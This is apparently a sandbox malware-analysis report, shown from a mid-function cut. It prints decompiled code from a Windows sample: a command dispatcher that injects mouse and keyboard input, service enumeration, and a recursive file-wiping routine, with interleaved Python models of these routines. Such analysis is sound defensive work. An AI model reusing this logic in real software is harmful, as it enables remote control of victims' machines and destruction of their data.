                    											}
                    										}
                    									}
                    									L38:
                    									__eflags = _t137;
                    									if(_t137 != 0) {
                    										_v8 = _t161;
                    									}
                    									__eflags =  *_t178;
                    									_t124 = 0 |  *_t178 != 0x00000000;
                    									_v16 = _t124;
                    									__eflags = _t124;
                    									_t27 =  &_v12; // 0x44307e
                    									_t125 =  *_t27;
                    									if(_t124 == 0) {
                    										 *((char*)( *((intOrPtr*)(_t125 + 4)))) = 0;
                    										L44:
                    										 *(E004428C7()) = _v8;
                    										_t128 = E004428BB();
                    										 *_t128 = _v16;
                    										return _t128;
                    									}
                    									_push(3);
                    									_t129 = E0044D309(_t161,  *((intOrPtr*)(_t125 + 4)), 0x40, _t178);
                    									_t193 = _t193 + 0x10;
                    									__eflags = _t129;
                    									if(_t129 == 0) {
                    										goto L44;
                    									}
                    								}
                    							}
                    							goto L46;
                    						}
                    					} else {
                    						_t166 = _t168;
                    						_t135 = _t178;
                    						while(1) {
                    							_t140 =  *_t135;
                    							if(_t140 !=  *_t166) {
                    								break;
                    							}
                    							if(_t140 == 0) {
                    								L8:
                    								_t116 = 0;
                    							} else {
                    								_t141 =  *((intOrPtr*)(_t135 + 1));
                    								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
                    									break;
                    								} else {
                    									_t135 = _t135 + 2;
                    									_t166 = _t166 + 2;
                    									if(_t141 != 0) {
                    										continue;
                    									} else {
                    										goto L8;
                    									}
                    								}
                    							}
                    							L10:
                    							if(_t116 == 0) {
                    								L45:
                    								return _t116;
                    							} else {
                    								_t11 =  &_v12; // 0x44307e
                    								_t137 =  *_t11;
                    								goto L12;
                    							}
                    							goto L82;
                    						}
                    						asm("sbb eax, eax");
                    						_t116 = _t135 | 0x00000001;
                    						__eflags = _t116;
                    						goto L10;
                    					}
                    				}
                    				L82:
                    			}

                    APIs
                    • _free.LIBCMT ref: 00442D10
                    • _free.LIBCMT ref: 00442D34
                    • _free.LIBCMT ref: 00442EBB
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045913C), ref: 00442ECD
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B754,000000FF,00000000,0000003F,00000000,?,?), ref: 00442F45
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B7A8,000000FF,?,0000003F,00000000,?), ref: 00442F72
                    • _free.LIBCMT ref: 00443087
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                    • String ID: ~0D$~0D
                    • API String ID: 314583886-1476019045
                    • Opcode ID: ff1d76a52a8688ecceb277c1551a573c3b2025c38d44ba6d272ba75c614cad4f
                    • Instruction ID: 8e12491e8a086c2fb2f0f953e3b521b5a94b3cb87029702874b2c6f79563a918
                    • Opcode Fuzzy Hash: ff1d76a52a8688ecceb277c1551a573c3b2025c38d44ba6d272ba75c614cad4f
                    • Instruction Fuzzy Hash: 48C13B71D00205ABEB10AF69CE40BAABBB8EF45314FA441AFF444D7251E7B88E46C75D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E00414F84(signed int __edx, void* __eflags, char _a8) {
                    				void* _v28;
                    				char _v32;
                    				void* _v36;
                    				void* _v40;
                    				char _v44;
                    				char _v48;
                    				intOrPtr* _t60;
                    				intOrPtr* _t65;
                    				intOrPtr* _t67;
                    				intOrPtr* _t72;
                    				intOrPtr* _t74;
                    				char* _t79;
                    				char* _t80;
                    				char* _t81;
                    				intOrPtr* _t82;
                    				intOrPtr* _t85;
                    				intOrPtr _t90;
                    				signed int _t101;
                    				signed int _t109;
                    				signed int _t118;
                    				signed int _t136;
                    
                    				_t136 = __edx;
                    				_t90 =  *((intOrPtr*)(E00405220(0)));
                    				E004042A6( &_a8,  &_v32, 1, 0xffffffff);
                    				if(_t90 != 0x30) {
                    					__eflags = _t90 - 0x31;
                    					if(_t90 != 0x31) {
                    						__eflags = _t90 - 0x32;
                    						if(_t90 != 0x32) {
                    							__eflags = _t90 - 0x33;
                    							if(_t90 != 0x33) {
                    								__eflags = _t90 - 0x34;
                    								if(_t90 != 0x34) {
                    									__eflags = _t90 - 0x35;
                    									if(_t90 != 0x35) {
                    										__eflags = _t90 - 0x36;
                    										if(_t90 == 0x36) {
                    											_push(0);
                    											_push(0x78);
                    											goto L15;
                    										}
                    									} else {
                    										_push(0);
                    										_push(0xffffff88);
                    										L15:
                    										mouse_event(0x800, 0, 0, ??, ??);
                    									}
                    								} else {
                    									_v40 =  *((intOrPtr*)(E00405220(0)));
                    									_t60 = E00405220(4);
                    									_t101 =  *0x46bd74; // 0x0
                    									_v40 =  *_t60;
                    									E00414E1E( *((intOrPtr*)(0x46bd78 + _t101 * 4)),  &_v44, __eflags,  &_v40);
                    									E00415250(_v44, _v40);
                    								}
                    							} else {
                    								_t65 = E00405220(0);
                    								_v44 =  *((intOrPtr*)(E00405220(4)));
                    								_t67 = E00405220(8);
                    								_t109 =  *0x46bd74; // 0x0
                    								_v44 =  *_t67;
                    								E00414E1E( *((intOrPtr*)(0x46bd78 + _t109 * 4)),  &_v48, __eflags,  &_v44);
                    								E004151F4( *_t65, _v48, _v44);
                    								goto L8;
                    							}
                    						} else {
                    							_t72 = E00405220(0);
                    							_v40 =  *((intOrPtr*)(E00405220(4)));
                    							_t74 = E00405220(8);
                    							_t118 =  *0x46bd74; // 0x0
                    							_v48 =  *_t74;
                    							E00414E1E( *((intOrPtr*)(0x46bd78 + _t118 * 4)),  &_v44, __eflags,  &_v48);
                    							E00415198( *_t72, _v44, _v48);
                    							goto L8;
                    						}
                    					} else { // '1': payload bytes 2, 3 and 4 are tested non-zero and passed as flags to E00415288
                    						_t79 = E00405220(4);
                    						_t80 = E00405220(3);
                    						_t81 = E00405220(2);
                    						_t82 = E00405220(0);
                    						 *_t79 =  *_t80;
                    						__eflags =  *_t81;
                    						E00415288( *_t82, __edx & 0xffffff00 |  *_t81 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0 |  *_t80 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0x000000ff);
                    						goto L8;
                    					}
                    				} else { // remaining opcode ('0'): payload offset 2 parsed with StrToIntA
                    					E00405220(0);
                    					_t85 = E00405220(1);
                    					E0041459C( *_t85, _t136 & 0xffffff00 |  *_t85 != 0x00000000,  *_t85, StrToIntA(E00405220(2)));
                    					L8:
                    				}
                    				E00401FC7();
                    				return E00401FC7();
                    			}

                    Statement addresses: 0x00414f84 - 0x00415197

                    APIs
                    • StrToIntA.SHLWAPI(00000000,00000002,00000001,00000000,?,00000001,000000FF,00000000), ref: 00414FD8
                    • mouse_event.USER32 ref: 0041517A
                      • Part of subcall function 00414E1E: GetSystemMetrics.USER32 ref: 00414E53
                      • Part of subcall function 00414E1E: GetSystemMetrics.USER32 ref: 00414E68
                      • Part of subcall function 00415250: SendInput.USER32(00000001,?,0000001C,?,00000000,?,00000001,000000FF,00000000), ref: 0041527C
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: MetricsSystem$InputSendmouse_event
                    • String ID: 0$1$2$3$4$5$6
                    • API String ID: 1731092567-2737206560
                    • Opcode ID: 02bf39f7816a9859347e8bfc8ed843a2cf5b6bd291f8f99223f9e26ce8eeecd4
                    • Instruction ID: 98728168b40b8b0f2fa1d2667a03c4bebee108b3f602935a09316417a0552965
                    • Opcode Fuzzy Hash: 02bf39f7816a9859347e8bfc8ed843a2cf5b6bd291f8f99223f9e26ce8eeecd4
                    • Instruction Fuzzy Hash: FB51DF74904701AFC700EF21E856BDB7794EF89310F40096EF592572D1DB38AA48CF9A
                    Uniqueness

                    Uniqueness Score: -1.00%
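
The dispatcher above keys on a single ASCII digit ('0' to '6', matching the String ID 0$1$2$3$4$5$6 recorded for this function) and, for '5' and '6', scrolls the wheel one notch through mouse_event(MOUSEEVENTF_WHEEL). The Python below is an added example, not code from the report or from the sample: it models that wheel branch and packs the 28-byte 32-bit INPUT record that E00415250 passes to SendInput(1, ..., 0x1C). It assumes E00405220(n) returns a pointer to byte n of the command payload (the accessor's body is not on this page), so the opcode is the payload's first byte.

```python
# Added example: model of the '5'/'6' wheel branch and of the 32-bit INPUT record
# used by the SendInput wrapper. Not the sample's code; see the lead-in for assumptions.
import struct
from typing import Optional

MOUSEEVENTF_WHEEL = 0x0800      # first argument of mouse_event in the listing
WHEEL_DELTA = 120               # 0x78 / 0xffffff88 pushed for opcodes '6' / '5'
INPUT_MOUSE = 0
# DWORD type + MOUSEINPUT{LONG dx, LONG dy, DWORD mouseData, DWORD dwFlags, DWORD time, ULONG_PTR dwExtraInfo}
INPUT32_FMT = "<IiiIIII"
SIZEOF_INPUT32 = struct.calcsize(INPUT32_FMT)   # 28 == 0x1C, the cbSize SendInput receives


def wheel_delta_for_opcode(payload: bytes) -> Optional[int]:
    """'5' scrolls one notch down, '6' one notch up; other opcodes are not wheel commands.
    Assumption: the opcode is the first payload byte."""
    return {b"5": -WHEEL_DELTA, b"6": WHEEL_DELTA}.get(payload[:1])


def mouse_event_args(payload: bytes) -> Optional[tuple]:
    """The (dwFlags, dx, dy, dwData, dwExtraInfo) tuple the '5'/'6' branches hand to mouse_event.
    dwData is a DWORD, so -120 travels as 0xFFFFFF88, exactly the immediate in the listing."""
    delta = wheel_delta_for_opcode(payload)
    if delta is None:
        return None
    return (MOUSEEVENTF_WHEEL, 0, 0, delta & 0xFFFFFFFF, 0)


def pack_mouse_input32(dx: int = 0, dy: int = 0, mouse_data: int = 0,
                       flags: int = 0, time: int = 0, extra: int = 0) -> bytes:
    """Pack one 32-bit INPUT with type INPUT_MOUSE (the layout behind cbSize == 0x1C)."""
    return struct.pack(INPUT32_FMT, INPUT_MOUSE, dx, dy, mouse_data & 0xFFFFFFFF,
                       flags, time, extra)


def unpack_mouse_input32(blob: bytes) -> dict:
    """Decode a packed INPUT; the wheel delta is re-signed when MOUSEEVENTF_WHEEL is set."""
    typ, dx, dy, mouse_data, flags, time, extra = struct.unpack(INPUT32_FMT, blob)
    if flags & MOUSEEVENTF_WHEEL and mouse_data & 0x80000000:
        mouse_data -= 1 << 32
    return {"type": typ, "dx": dx, "dy": dy, "mouseData": mouse_data,
            "dwFlags": flags, "time": time, "dwExtraInfo": extra}


def wheel_input32(payload: bytes) -> Optional[bytes]:
    """Equivalent SendInput record for a '5'/'6' command, or None for other opcodes."""
    delta = wheel_delta_for_opcode(payload)
    if delta is None:
        return None
    return pack_mouse_input32(mouse_data=delta, flags=MOUSEEVENTF_WHEEL)


if __name__ == "__main__":
    for cmd in (b"5", b"6", b"2"):     # constructed payloads: two wheel opcodes and one that is not
        print(cmd, mouse_event_args(cmd), wheel_input32(cmd))
```

The struct size is the useful check here: a 32-bit INPUT is 28 bytes, which matches the 0x1C passed to SendInput in E00415250 and confirms that wrapper sends a single mouse record.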

                    C-Code - Quality: 94%
                    			E004160DB(intOrPtr __ecx) {
                    				int _v8;
                    				int _v12;
                    				int _v16;
                    				int _v20;
                    				struct _QUERY_SERVICE_CONFIG* _v24;
                    				void* _v28;
                    				intOrPtr _v32;
                    				short** _v36;
                    				intOrPtr _v40;
                    				char _v64;
                    				char _v88;
                    				char _v112;
                    				char _v136;
                    				struct _ENUM_SERVICE_STATUS _v172;
                    				void* __ebx;
                    				void* __edi;
                    				struct _ENUM_SERVICE_STATUS* _t87;
                    				void* _t100;
                    				void* _t107;
                    				int _t108;
                    				long _t110;
                    				void* _t133;
                    				intOrPtr _t198;
                    				short** _t199;
                    				int _t201;
                    				intOrPtr _t202;
                    				int _t203;
                    
                    				_t198 = __ecx;
                    				_v40 = __ecx;
                    				_t133 = OpenSCManagerA(0, 0, 4); // SC_MANAGER_ENUMERATE_SERVICE
                    				if(_t133 != 0) {
                    					E00401F6D(_t133,  &_v88);
                    					_v12 = 0;
                    					_v8 = 0;
                    					_v20 = 0;
                    					__eflags = EnumServicesStatusW(_t133, 0x3b, 3,  &_v172, 0,  &_v12,  &_v8,  &_v20); // 0x3b = SERVICE_WIN32 | SERVICE_DRIVER, 3 = SERVICE_STATE_ALL; zero-length buffer to learn the size
                    					if(__eflags != 0) {
                    						L12:
                    						CloseServiceHandle(_t133);
                    						E0040331A(_t133, _t198, __eflags,  &_v88);
                    						E00401EF0();
                    						L13:
                    						return _t198;
                    					}
                    					__eflags = GetLastError() - 0xea; // ERROR_MORE_DATA is the expected result of the sizing call
                    					if(__eflags != 0) {
                    						goto L12;
                    					}
                    					_t201 = _v12;
                    					_push(_t201);
                    					_t87 = E004394F6( &_v88);
                    					_v36 = _t87;
                    					EnumServicesStatusW(_t133, 0x3b, 3, _t87, _t201,  &_v12,  &_v8,  &_v20);
                    					_t202 = 0;
                    					_v32 = 0;
                    					__eflags = _v8;
                    					if(__eflags <= 0) {
                    						L11:
                    						L004394F1(_v36);
                    						goto L12;
                    					}
                    					_t199 = _v36;
                    					do {
                    						E00403311(E00404405(_t133,  &_v112, _t199[1], __eflags, E0040427F(_t133,  &_v64, 0x4659c4))); // _t199[1] = lpDisplayName
                    						E00401EF0();
                    						E00401EF0();
                    						E00403311(E00404405(_t133,  &_v64,  *_t199, __eflags, E0040427F(_t133,  &_v112, 0x4659c4))); // *_t199 = lpServiceName
                    						E00401EF0();
                    						E00401EF0();
                    						_t100 = E0040427F(_t133,  &_v136, 0x4659c4);
                    						E00403311(E00403030( &_v64, E0041729F(_t133,  &_v112, _t199[3]), _t100)); // _t199[3] = ServiceStatus.dwCurrentState
                    						E00401EF0();
                    						E00401EF0();
                    						E00401EF0();
                    						_v16 = _v16 & 0x00000000;
                    						_t107 = OpenServiceW(_t133,  *_t199, 1); // SERVICE_QUERY_CONFIG
                    						_v28 = _t107;
                    						_t108 = QueryServiceConfigW(_t107, _v24, 0,  &_v16); // sizing call: cbBufSize = 0, required size returned in _v16
                    						__eflags = _t108;
                    						if(_t108 == 0) {
                    							_t110 = GetLastError();
                    							__eflags = _t110 - 0x7a; // ERROR_INSUFFICIENT_BUFFER
                    							if(_t110 == 0x7a) {
                    								_t203 = _v16;
                    								_push(_t203);
                    								_v24 = E004394F6( &_v16);
                    								_t204 = _v24;
                    								QueryServiceConfigW(_v28, _v24, _t203,  &_v16);
                    								E00403311(E004030A6(_t133,  &_v136, E0041729F(_t133,  &_v64,  *_v24), _t199, __eflags, 0x4659c4)); // cfg+0: dwServiceType
                    								E00401EF0();
                    								E00401EF0();
                    								E00403311(E004030A6(_t133,  &_v136, E0041729F(_t133,  &_v64,  *((intOrPtr*)(_t204 + 4))), _t199, __eflags, 0x4659c4)); // cfg+4: dwStartType
                    								E00401EF0();
                    								E00401EF0();
                    								E00403311(E004030A6(_t133,  &_v136, E00404405(_t133,  &_v64,  *((intOrPtr*)(_t204 + 0xc)), __eflags, E0040427F(_t133,  &_v112, 0x4659c4)), _t199, __eflags, "\n")); // cfg+0xc: lpBinaryPathName, one record per line
                    								E00401EF0();
                    								E00401EF0();
                    								E00401EF0();
                    								L004394F1(_t204);
                    								_t202 = _v32;
                    							}
                    						}
                    						CloseServiceHandle(_v28);
                    						_t202 = _t202 + 1;
                    						_t199 =  &(_t199[9]); // next ENUM_SERVICE_STATUSW (9 dwords, 0x24 bytes)
                    						_v32 = _t202;
                    						__eflags = _t202 - _v8;
                    					} while (__eflags < 0);
                    					_t198 = _v40;
                    					goto L11;
                    				}
                    				E0040427F(_t133, _t198, 0x45f724);
                    				goto L13;
                    			}

                    Statement addresses: 0x004160eb - 0x004163ac

                    APIs
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,0046BACC,0046C998), ref: 004160F2
                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,00415BDC,?), ref: 00416139
                    • GetLastError.KERNEL32(?,0046BACC,0046C998), ref: 00416147
                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,00415BDC,?), ref: 00416178
                    • OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,004659C4,00000000,004659C4,00000000,004659C4,?,0046BACC,0046C998), ref: 00416248
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: EnumOpenServicesStatus$ErrorLastManagerService
                    • String ID:
                    • API String ID: 2247270020-0
                    • Opcode ID: c6a92f844cde82fafec512e43e8d978dbcbce82eb2953aa0a7a725d785e2f1d0
                    • Instruction ID: 68473e94775990671fd8c6040cdbc231cd1f0957a3a8cd51887978b0f5e9c903
                    • Opcode Fuzzy Hash: c6a92f844cde82fafec512e43e8d978dbcbce82eb2953aa0a7a725d785e2f1d0
                    • Instruction Fuzzy Hash: 7B814D71D00209AACB14EBA1DC929EEB739EF14345F10406EF916761D2EF386A09CB98
                    Uniqueness

                    Uniqueness Score: -1.00%
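
E004160DB uses the two-call sizing pattern twice: EnumServicesStatusW with a zero-length buffer, repeated once GetLastError() reports ERROR_MORE_DATA (0xea), and QueryServiceConfigW the same way on ERROR_INSUFFICIENT_BUFFER (0x7a). The second round trip is unavoidable because QUERY_SERVICE_CONFIGW keeps its strings behind the fixed header in the same allocation, referenced through absolute pointers. The Python below is an added example rather than the sample's code: it lays out such an allocation from constructed values at an assumed base address and reads back exactly the three fields the listing consumes (offsets 0, 4 and 0xc), expanding the 0x3b service-type mask along the way.

```python
# Added example: 32-bit QUERY_SERVICE_CONFIGW layout as the sample reads it.
# The buffer and the base address below are constructed, not captured from the sample.
import struct

SERVICE_TYPE_BITS = {
    0x001: "SERVICE_KERNEL_DRIVER",
    0x002: "SERVICE_FILE_SYSTEM_DRIVER",
    0x004: "SERVICE_ADAPTER",
    0x008: "SERVICE_RECOGNIZER_DRIVER",
    0x010: "SERVICE_WIN32_OWN_PROCESS",
    0x020: "SERVICE_WIN32_SHARE_PROCESS",
    0x100: "SERVICE_INTERACTIVE_PROCESS",
}
START_TYPES = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START", 2: "SERVICE_AUTO_START",
               3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED"}
# dwServiceType, dwStartType, dwErrorControl, lpBinaryPathName, lpLoadOrderGroup,
# dwTagId, lpDependencies, lpServiceStartName, lpDisplayName
HEADER_FMT = "<IIIIIIIII"
HEADER_SIZE = struct.calcsize(HEADER_FMT)   # 0x24 on 32-bit
ERROR_INSUFFICIENT_BUFFER = 0x7A
ERROR_MORE_DATA = 0xEA


def service_type_names(mask: int):
    """Expand a dwServiceType mask; 0x3b in the listing is SERVICE_WIN32 | SERVICE_DRIVER."""
    return [name for bit, name in sorted(SERVICE_TYPE_BITS.items()) if mask & bit]


def build_query_service_config32(base: int, service_type: int, start_type: int,
                                 binary_path: str, start_name: str, display_name: str) -> bytes:
    """Constructed allocation: fixed header followed by the UTF-16LE strings the lpXxx
    members point at. The pointers are absolute (base + offset), which is why a caller
    must learn the full size via ERROR_INSUFFICIENT_BUFFER before the real call."""
    strings = b""
    ptrs = {}
    for key, text in (("bin", binary_path), ("start", start_name), ("display", display_name)):
        ptrs[key] = base + HEADER_SIZE + len(strings)
        strings += text.encode("utf-16-le") + b"\x00\x00"
    header = struct.pack(HEADER_FMT, service_type, start_type, 1, ptrs["bin"],
                         0, 0, 0, ptrs["start"], ptrs["display"])   # NULL group/dependencies
    return header + strings


def read_wstr(buf: bytes, off: int) -> str:
    """NUL-terminated UTF-16LE string at buffer offset off."""
    end = off
    while buf[end:end + 2] not in (b"\x00\x00", b""):
        end += 2
    return buf[off:end].decode("utf-16-le")


def parse_as_sample_does(buf: bytes, base: int) -> dict:
    """Read only what E004160DB reads: *(cfg+0), *(cfg+4) and the string behind *(cfg+0xc)."""
    service_type, start_type = struct.unpack_from("<II", buf, 0)
    (p_bin,) = struct.unpack_from("<I", buf, 0xC)
    return {
        "dwServiceType": service_type,
        "type_names": service_type_names(service_type),
        "dwStartType": START_TYPES.get(start_type, hex(start_type)),
        "lpBinaryPathName": read_wstr(buf, p_bin - base),   # pointer rebased into the buffer
    }


if __name__ == "__main__":
    base = 0x00C50000   # assumed heap address of the constructed allocation
    args = (0x10, 2, r"C:\Windows\System32\svchost.exe -k netsvcs", "LocalSystem", "Example")
    buf = build_query_service_config32(base, *args)
    print(len(buf), parse_as_sample_does(buf, base))
```

The 0x24-byte header size also explains the `&(_t199[9])` stride in the outer loop: ENUM_SERVICE_STATUSW is nine dwords as well, so the sample walks the enumeration array one record at a time.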

                    C-Code - Quality: 100%
                    			E105A85C2(WCHAR* __ecx) {
                    				char _v5;
                    				WCHAR* _v12;
                    				short _v532;
                    				short _v1052;
                    				struct _WIN32_FIND_DATAW _v1644;
                    				signed int _t52;
                    				intOrPtr _t53;
                    				signed int _t56;
                    				intOrPtr _t57;
                    				signed int _t63;
                    				char _t68;
                    				void _t72;
                    				void _t73;
                    				signed int _t78;
                    				signed int _t84;
                    				void* _t86;
                    				intOrPtr* _t89;
                    				signed short* _t90;
                    				void* _t91;
                    				signed int _t95;
                    				void* _t100;
                    				void* _t102;
                    				signed short* _t103;
                    				void* _t106;
                    				void* _t107;
                    				signed int _t108;
                    				intOrPtr* _t110;
                    				void* _t112;
                    				void* _t118;
                    				void* _t120;
                    				void* _t123;
                    				void* _t124;
                    
                    				_v12 = __ecx;
                    				_t103 = __ecx;
                    				_t118 =  &_v1052 - __ecx;
                    				do {
                    					_t52 =  *_t103 & 0x0000ffff;
                    					 *(_t118 + _t103) = _t52;
                    					_t103 =  &(_t103[1]);
                    				} while (_t52 != 0);
                    				_t89 =  &_v1052 - 2;
                    				do {
                    					_t53 =  *((intOrPtr*)(_t89 + 2));
                    					_t89 = _t89 + 2;
                    				} while (_t53 != 0);
                    				 *_t89 =  *0x465914;
                    				_t106 =  &_v532 - __ecx;
                    				 *((short*)(_t89 + 4)) =  *0x465918;
                    				_t90 = __ecx;
                    				do {
                    					_t56 =  *_t90 & 0x0000ffff;
                    					 *(_t106 + _t90) = _t56;
                    					_t90 =  &(_t90[1]);
                    				} while (_t56 != 0);
                    				_t110 =  &_v532 - 2;
                    				do {
                    					_t57 =  *((intOrPtr*)(_t110 + 2));
                    					_t110 = _t110 + 2;
                    				} while (_t57 != 0);
                    				 *_t110 =  *0x45f948;
                    				_t86 = FindFirstFileW( &_v1052,  &_v1644); // _v1052 = <dir> + L"\\*" (0x465914 resolves to L"\\*" in the E00417754 listing)
                    				if(_t86 == 0xffffffff) { // INVALID_HANDLE_VALUE
                    					L34:
                    					return 0;
                    				}
                    				_t91 = 0;
                    				do {
                    					_t63 =  *(_t123 + _t91 - 0x210) & 0x0000ffff;
                    					_t91 = _t91 + 2;
                    					 *(_t123 + _t91 - 0x41a) = _t63;
                    				} while (_t63 != 0);
                    				_v5 = 1;
                    				do {
                    					if(FindNextFileW(_t86,  &_v1644) == 0) {
                    						if(GetLastError() != 0x12) { // anything but ERROR_NO_MORE_FILES is a real failure
                    							L33:
                    							FindClose(_t86);
                    							goto L34;
                    						}
                    						_t68 = 0;
                    						_v5 = 0;
                    						goto L23;
                    					}
                    					if(E105A854C( &(_v1644.cFileName)) != 0) { // entry filter, presumably "." and ".." (its body is not shown here)
                    						L22:
                    						_t68 = _v5;
                    						goto L23;
                    					}
                    					_t107 =  &(_v1644.cFileName);
                    					_t120 = _t107;
                    					do {
                    						_t72 =  *_t107;
                    						_t107 = _t107 + 2;
                    					} while (_t72 != 0);
                    					_t108 = _t107 - _t120;
                    					_t112 =  &_v532 - 2;
                    					do {
                    						_t73 =  *(_t112 + 2);
                    						_t112 = _t112 + 2;
                    					} while (_t73 != 0);
                    					_t95 = _t108 >> 2;
                    					memcpy(_t112, _t120, _t95 << 2);
                    					memcpy(_t120 + _t95 + _t95, _t120, _t108 & 0x00000003);
                    					_t124 = _t124 + 0x18;
                    					if((_v1644.dwFileAttributes & 0x00000010) == 0) { // not FILE_ATTRIBUTE_DIRECTORY
                    						if((_v1644.dwFileAttributes & 0x00000001) != 0) { // FILE_ATTRIBUTE_READONLY would make DeleteFileW fail
                    							SetFileAttributesW( &_v532, 0x80); // FILE_ATTRIBUTE_NORMAL
                    						}
                    						if(DeleteFileW( &_v532) == 0) {
                    							goto L33;
                    						} else {
                    							_t100 = 0;
                    							do {
                    								_t78 =  *(_t123 + _t100 - 0x418) & 0x0000ffff;
                    								_t100 = _t100 + 2;
                    								 *(_t123 + _t100 - 0x212) = _t78;
                    							} while (_t78 != 0);
                    							goto L22;
                    						}
                    					}
                    					if(E105A85C2( &_v532) == 0) { // recurse into the subdirectory; its failure aborts the whole walk
                    						goto L33;
                    					}
                    					RemoveDirectoryW( &_v532);
                    					_t102 = 0;
                    					do {
                    						_t84 =  *(_t123 + _t102 - 0x418) & 0x0000ffff;
                    						_t102 = _t102 + 2;
                    						 *(_t123 + _t102 - 0x212) = _t84;
                    					} while (_t84 != 0);
                    					goto L22;
                    					L23:
                    				} while (_t68 != 0);
                    				FindClose(_t86);
                    				return RemoveDirectoryW(_v12);
                    			}

                    Statement addresses: 0x105a85d6 - 0x105a87ac

                    APIs
                    • FindFirstFileW.KERNEL32(?,?,?,?,0046C238), ref: 105A8659
                    • FindNextFileW.KERNEL32(00000000,?,?,?,0046C238), ref: 105A8690
                    • RemoveDirectoryW.KERNEL32(?,?,?,0046C238), ref: 105A870A
                    • FindClose.KERNEL32(00000000,?,?,0046C238), ref: 105A8738
                    • RemoveDirectoryW.KERNEL32(?,?,?,0046C238), ref: 105A8741
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,0046C238), ref: 105A875E
                    • DeleteFileW.KERNEL32(?,?,?,0046C238), ref: 105A876B
                    • GetLastError.KERNEL32(?,?,0046C238), ref: 105A8793
                    • FindClose.KERNEL32(00000000,?,?,0046C238), ref: 105A87A6
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                    • String ID:
                    • API String ID: 2341273852-0
                    • Opcode ID: 2d53b322898e3808e9dee1ab89742ccc995be15de5dfc28abab10a672681bbc4
                    • Instruction ID: fe0813357b28ec706514b4bea357bafe9a2899ab05da6043e83b300a5cded870
                    • Opcode Fuzzy Hash: 2d53b322898e3808e9dee1ab89742ccc995be15de5dfc28abab10a672681bbc4
                    • Instruction Fuzzy Hash: B951243450025ACACB14DFA8C8887FEBBB4FF54385F5141E9E80993151FB329E8ACB54
                    Uniqueness

                    Uniqueness Score: -1.00%
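
E105A85C2 (in the injected region at 0x10590000) and E00417754 (in the image at 0x400000, listed next) are the same recursive delete routine; the second listing resolves the appended literals as L"\\*" and "\\". The Python below is an added portable model, not the sample's code. It follows the listing's control flow on a constructed temporary tree: the read-only attribute is cleared before the delete, subdirectories are recursed before removal, the first failed delete or failed recursion aborts with 0, and the root is removed last. It assumes the unlisted helper E105A854C / E004176DE is the "." and ".." filter.

```python
# Added example: portable model of the recursive delete routine. Not the sample's code;
# the temp tree is constructed here so the model can be run offline.
import os
import stat
import tempfile


def remove_tree(root: str) -> bool:
    """Delete root and everything under it with the listing's semantics: False on an
    unopenable directory (INVALID_HANDLE_VALUE), on a failed file delete or on a failed
    recursion; otherwise the result of removing root itself."""
    try:
        entries = list(os.scandir(root))          # FindFirstFileW(root\*) ... FindNextFileW
    except OSError:
        return False
    for entry in entries:                         # assumption: E105A854C skips "." and ".."; scandir never yields them
        if entry.is_dir(follow_symlinks=False):   # FILE_ATTRIBUTE_DIRECTORY set
            if not remove_tree(entry.path):       # failed recursion -> L33
                return False
            try:
                os.rmdir(entry.path)              # caller's RemoveDirectoryW; its result is not checked in the listing
            except OSError:
                pass
        else:
            st = entry.stat(follow_symlinks=False)
            if not st.st_mode & stat.S_IWUSR:     # FILE_ATTRIBUTE_READONLY -> SetFileAttributesW(FILE_ATTRIBUTE_NORMAL)
                # DeleteFileW refuses read-only files on Windows; on POSIX the chmod is harmless
                os.chmod(entry.path, st.st_mode | stat.S_IWUSR)
            try:
                os.unlink(entry.path)             # DeleteFileW; the first failure aborts the walk
            except OSError:
                return False
    try:
        os.rmdir(root)                            # final RemoveDirectoryW(_v12) is the return value
        return True
    except OSError:
        return False


def make_sample_tree() -> str:
    """Constructed input: a nested directory with a read-only file and a normal file."""
    root = tempfile.mkdtemp(prefix="rmtree_model_")
    os.makedirs(os.path.join(root, "sub", "deeper"))
    ro = os.path.join(root, "sub", "readonly.bin")
    with open(ro, "wb") as fh:
        fh.write(b"\x00" * 16)
    os.chmod(ro, stat.S_IRUSR)                    # the case the attribute reset exists for
    with open(os.path.join(root, "sub", "deeper", "a.txt"), "w") as fh:
        fh.write("a")
    return root


if __name__ == "__main__":
    sample = make_sample_tree()
    print(sample, remove_tree(sample), os.path.exists(sample))
```

Each subdirectory ends up being removed twice: once by the recursive call's final RemoveDirectoryW and again by the caller after the call returns, which is why the model ignores the second rmdir's failure.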

                    C-Code - Quality: 100%
                    			E00417754(WCHAR* __ecx) {
                    				char _v5;
                    				WCHAR* _v12;
                    				short _v532;
                    				short _v1052;
                    				struct _WIN32_FIND_DATAW _v1644;
                    				signed int _t52;
                    				intOrPtr _t53;
                    				char _t54;
                    				short _t55;
